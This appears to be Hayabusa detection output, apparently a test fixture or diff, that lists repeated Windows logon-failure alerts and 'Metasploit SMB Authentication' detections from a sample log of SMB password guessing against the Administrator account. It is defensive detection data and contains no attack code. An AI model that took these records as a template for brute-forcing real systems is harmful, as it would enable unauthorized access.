+2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qzxJYBbM7ZMaaGOo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wO5GFBqSltNfjtQT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PdsMzjfP1ZcPju2i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2LqpKmoCX9slPXie  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ouHvw1LXTN3OSFYb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tZIB1QO7hfugceJg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u4QU2BQ0u5tJsdjG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0P7NKiKCmLvu6L1L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4obkK4RfsLZe5gdi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JRUDpDLhgop8d1el  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LvdsNkFqfFWRePXJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5wvd8c1jYrEZMcKI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AWvECxgkvWdg9Zdc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lHHPOAYSMSp3BhX7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rJicXUMfrx9BOzHI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eybrQWvrvwSkNADJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VVMPCaQB0XteDSwC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lbjjLoATZE6KPIQv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tips954DRcYeIB2T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nLe9aMiMz0akxfWW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: csroGB9KZOZkb5sY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Zl4Rc25RsvJ7Y9H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C5CxqCFOIJBMZCD6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gVPwxpR05F3B5aXp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nP317UkK2DhTD5Rd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ir3c7dqXm1LhbfqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1U1QZiJSrEufxF3b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HZnDnDhTPuC9n5A1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 72gY1ClzwuisAhKW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nrneLGOZCwPIeQgT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dm3gGV2yR4B3yrJi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fzeklLG1KCTE5FpP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uZPwxCw3EWy9NShk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MalB3OcsOsRaMtS3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XMZMqCYPHO3n4RIh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I1VUeIuU1rQPISNA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: md4ioB8wNiaz2EKB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nM8QaFeqwDfJZ1gc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlR75rMhpLnfQZbC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WF8BcOe4YUDYTXkj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FK0Iiao20PyPmtTk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kQbCbAHrQilFmMZP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VUdXQOw98VVoksDM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fISqpC8eKlaQGabv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s5Y0VryMAHjtB3n2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
